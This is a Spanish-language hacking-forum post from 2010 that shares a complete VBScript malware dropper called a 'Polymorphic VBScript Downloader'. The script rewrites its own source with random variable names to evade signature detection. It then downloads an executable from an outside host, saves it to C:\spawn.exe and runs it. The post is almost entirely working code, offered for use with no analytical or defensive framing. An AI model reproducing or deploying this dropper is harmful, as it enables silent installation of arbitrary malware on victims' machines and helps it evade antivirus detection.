Downloader Polymorphic

Iniciado por ANTRAX, Febrero 23, 2010, 10:07:44 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Código: php
' Polymorphic VBSript Downloader
' Kolor

Randomize
set fso=createobject("scripting.filesystemobject")
set vbsfile=fso.opentextfile(wscript.scriptfullname,1,false)
code=vbsfile.readall
vars=array("code","vars","var","newlet","num","newlet","fso","vbsfile","HTTPGET","reg","pth","SendBinary","url")
'
' ^^ Set all vaariables (sic) ^^
'
for each var in vars
for num=1 to int(rnd*14) + 2
if int(rnd*2)+1=1 then
  newlet=newlet& ucase(chr((int(rnd*22)+97)))
  if int(rnd*2)+1=1 then
   newlet=newlet & int(rnd*int(rnd*4))
  end if
else
  newlet=newlet&lcase(chr((int(rnd*22)+97)))
  if int(rnd*2)+1=1 then
   newlet=newlet&int(rnd *2)
  else
   newlet=newlet&int(rnd*int(rnd*6))
  end if
end if
next
code=replace(code,var,newlet)
newlet=""
next
set vbsfile=fso.opentextfile(wscript.scriptfullname,2,false)
vbsfile.write code
url = "http://kolor.doesntexist.com/demo.exe"
pth = "C:\spawn.exe"
Set HTTPGET = CreateObject("Microsoft.XMLHTTP")
HTTPGET.Open "GET", url, false
HTTPGET.Send
DataBin = HTTPGET.ResponseBody
Const adTypeBinary=1
Const adSaveCreateOverWrite=2
Dim SendBinary
Set SendBinary = CreateObject("ADODB.Stream")
SendBinary.Type = adTypeBinary
SendBinary.Open
SendBinary.Write DataBin
SendBinary.SaveToFile pth, adSaveCreateOverWrite
set reg = createobject("WScript.shell")
reg.run(pth)